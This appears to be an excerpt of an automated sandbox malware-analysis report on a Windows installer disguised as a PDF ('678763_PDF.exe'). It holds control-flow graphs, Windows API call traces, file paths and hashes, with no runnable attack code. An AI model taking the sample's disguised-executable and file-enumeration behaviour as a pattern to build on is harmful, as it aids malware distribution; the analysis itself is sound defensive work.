                                                                                                                                                                                    control_flow_graph 450 405c63-405c89 call 405f2e 453 405ca2-405ca9 450->453 454 405c8b-405c9d DeleteFileW 450->454 456 405cab-405cad 453->456 457 405cbc-405ccc call 406557 453->457 455 405e1f-405e23 454->455 458 405cb3-405cb6 456->458 459 405dcd-405dd2 456->459 463 405cdb-405cdc call 405e72 457->463 464 405cce-405cd9 lstrcatW 457->464 458->457 458->459 459->455 462 405dd4-405dd7 459->462 465 405de1-405de9 call 4068b4 462->465 466 405dd9-405ddf 462->466 467 405ce1-405ce5 463->467 464->467 465->455 473 405deb-405dff call 405e26 call 405c1b 465->473 466->455 470 405cf1-405cf7 lstrcatW 467->470 471 405ce7-405cef 467->471 474 405cfc-405d18 lstrlenW FindFirstFileW 470->474 471->470 471->474 490 405e01-405e04 473->490 491 405e17-405e1a call 4055dc 473->491 476 405dc2-405dc6 474->476 477 405d1e-405d26 474->477 476->459 481 405dc8 476->481 478 405d46-405d5a call 406557 477->478 479 405d28-405d30 477->479 492 405d71-405d7c call 405c1b 478->492 493 405d5c-405d64 478->493 482 405d32-405d3a 479->482 483 405da5-405db5 FindNextFileW 479->483 481->459 482->478 486 405d3c-405d44 482->486 483->477 489 405dbb-405dbc FindClose 483->489 486->478 486->483 489->476 490->466 494 405e06-405e15 call 4055dc call 406317 490->494 491->455 503 405d9d-405da0 call 4055dc 492->503 504 405d7e-405d81 492->504 493->483 495 405d66-405d6f call 405c63 493->495 494->455 495->483 503->483 507 405d83-405d93 call 4055dc call 406317 504->507 508 405d95-405d9b 504->508 507->483 508->483
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405C8C
                                                                                                                                                                                    • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CD4
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CF7
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405CFD
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405D0D
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\678763_PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                                                                                                                    • API String ID: 2035342205-279532564
                                                                                                                                                                                    • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                                                                                                                    • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 765 4068b4-4068c8 FindFirstFileW 766 4068d5 765->766 767 4068ca-4068d3 FindClose 765->767 768 4068d7-4068d8 766->768 767->768
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 004068B4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
                                                                                                                                                                                    • API String ID: 2295610775-3377814068
                                                                                                                                                                                    • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                                                    • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 202 403fd7-403fe9 203 404150-40415f 202->203 204 403fef-403ff5 202->204 205 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 203->205 206 4041ae-4041c3 203->206 204->203 207 403ffb-404004 204->207 205->206 209 404203-404208 call 404522 206->209 210 4041c5-4041c8 206->210 211 404006-404013 SetWindowPos 207->211 212 404019-404020 207->212 226 40420d-404228 209->226 214 4041ca-4041d5 call 401389 210->214 215 4041fb-4041fd 210->215 211->212 217 404022-40403c ShowWindow 212->217 218 404064-40406a 212->218 214->215 242 4041d7-4041f6 SendMessageW 214->242 215->209 225 4044a3 215->225 219 404042-404055 GetWindowLongW 217->219 220 40413d-40414b call 40453d 217->220 222 404083-404086 218->222 223 40406c-40407e DestroyWindow 218->223 219->220 227 40405b-40405e ShowWindow 219->227 230 4044a5-4044ac 220->230 231 404088-404094 SetWindowLongW 222->231 232 404099-40409f 222->232 229 404480-404486 223->229 225->230 235 404231-404237 226->235 236 40422a-40422c call 40140b 226->236 227->218 229->225 238 404488-40448e 229->238 231->230 232->220 241 4040a5-4040b4 GetDlgItem 232->241 239 404461-40447a DestroyWindow EndDialog 235->239 240 40423d-404248 235->240 236->235 238->225 244 404490-404499 ShowWindow 238->244 239->229 240->239 245 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 240->245 246 4040d3-4040d6 241->246 247 4040b6-4040cd SendMessageW IsWindowEnabled 241->247 242->230 244->225 274 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 245->274 275 40429d-4042a2 245->275 249 4040d8-4040d9 246->249 250 4040db-4040de 246->250 247->225 247->246 252 404109-40410e call 4044af 249->252 253 4040e0-4040e6 250->253 254 4040ec-4040f1 250->254 252->220 257 404127-404137 SendMessageW 253->257 258 4040e8-4040ea 253->258 254->257 259 4040f3-4040f9 254->259 257->220 258->252 260 404110-404119 call 40140b 259->260 261 4040fb-404101 call 40140b 259->261 260->220 271 40411b-404125 260->271 270 404107 261->270 270->252 271->270 278 4042e3-4042e4 274->278 279 4042e6 274->279 275->274 280 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404318-404329 SendMessageW 280->281 282 40432b 280->282 283 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 281->283 282->283 283->226 294 404376-404378 283->294 294->226 295 40437e-404382 294->295 296 4043a1-4043b5 DestroyWindow 295->296 297 404384-40438a 295->297 296->229 299 4043bb-4043e8 CreateDialogParamW 296->299 297->225 298 404390-404396 297->298 298->226 300 40439c 298->300 299->229 301 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->225 301->225 306 404447-40445a ShowWindow call 404522 301->306 308 40445f 306->308 308->229
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 121052019-0
                                                                                                                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 309 403c29-403c41 call 40694b 312 403c43-403c53 call 40649e 309->312 313 403c55-403c8c call 406425 309->313 322 403caf-403cd8 call 403eff call 405f2e 312->322 317 403ca4-403caa lstrcatW 313->317 318 403c8e-403c9f call 406425 313->318 317->322 318->317 327 403d6a-403d72 call 405f2e 322->327 328 403cde-403ce3 322->328 333 403d80-403da5 LoadImageW 327->333 334 403d74-403d7b call 406594 327->334 328->327 329 403ce9-403d11 call 406425 328->329 329->327 336 403d13-403d17 329->336 338 403e26-403e2e call 40140b 333->338 339 403da7-403dd7 RegisterClassW 333->339 334->333 340 403d29-403d35 lstrlenW 336->340 341 403d19-403d26 call 405e53 336->341 352 403e30-403e33 338->352 353 403e38-403e43 call 403eff 338->353 342 403ef5 339->342 343 403ddd-403e21 SystemParametersInfoW CreateWindowExW 339->343 347 403d37-403d45 lstrcmpiW 340->347 348 403d5d-403d65 call 405e26 call 406557 340->348 341->340 346 403ef7-403efe 342->346 343->338 347->348 351 403d47-403d51 GetFileAttributesW 347->351 348->327 355 403d53-403d55 351->355 356 403d57-403d58 call 405e72 351->356 352->346 362 403e49-403e63 ShowWindow call 4068db 353->362 363 403ecc-403ecd call 4056af 353->363 355->348 355->356 356->348 368 403e65-403e6a call 4068db 362->368 369 403e6f-403e81 GetClassInfoW 362->369 366 403ed2-403ed4 363->366 370 403ed6-403edc 366->370 371 403eee-403ef0 call 40140b 366->371 368->369 374 403e83-403e93 GetClassInfoW RegisterClassW 369->374 375 403e99-403ebc DialogBoxParamW call 40140b 369->375 370->352 376 403ee2-403ee9 call 40140b 370->376 371->342 374->375 379 403ec1-403eca call 403b79 375->379 376->352 379->346
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                    • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\678763_PDF.exe",00008001), ref: 00403CAA
                                                                                                                                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91
                                                                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\678763_PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-842240826
                                                                                                                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 403 403205-403208 396->403 404 403258-40325d 396->404 400 403130-403139 call 4034d4 398->400 401 40312e 398->401 408 40325f-403267 call 40301e 400->408 409 40313f-403146 400->409 401->400 406 40320a-403222 call 4034ea call 4034d4 403->406 407 40322c-403256 GlobalAlloc call 4034ea call 4032b9 403->407 404->388 406->404 429 403224-40322a 406->429 407->404 434 403269-40327a 407->434 408->404 413 4031c2-4031c6 409->413 414 403148-40315c call 406002 409->414 418 4031d0-4031d6 413->418 419 4031c8-4031cf call 40301e 413->419 414->418 432 40315e-403165 414->432 425 4031e5-4031ed 418->425 426 4031d8-4031e2 call 406a38 418->426 419->418 425->398 433 4031f3 425->433 426->425 429->404 429->407 432->418 436 403167-40316e 432->436 433->396 437 403282-403287 434->437 438 40327c 434->438 436->418 440 403170-403177 436->440 439 403288-40328e 437->439 438->437 439->439 441 403290-4032ab SetFilePointer call 406002 439->441 440->418 442 403179-403180 440->442 445 4032b0 441->445 442->418 444 403182-4031a2 442->444 444->404 446 4031a8-4031ac 444->446 445->388 447 4031b4-4031bc 446->447 448 4031ae-4031b2 446->448 447->418 449 4031be-4031c0 447->449 448->433 448->447 449->418
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\678763_PDF.exe,00000400), ref: 004030AF
                                                                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 004030FB
                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\678763_PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\678763_PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                    • API String ID: 2803837635-1744682579
                                                                                                                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
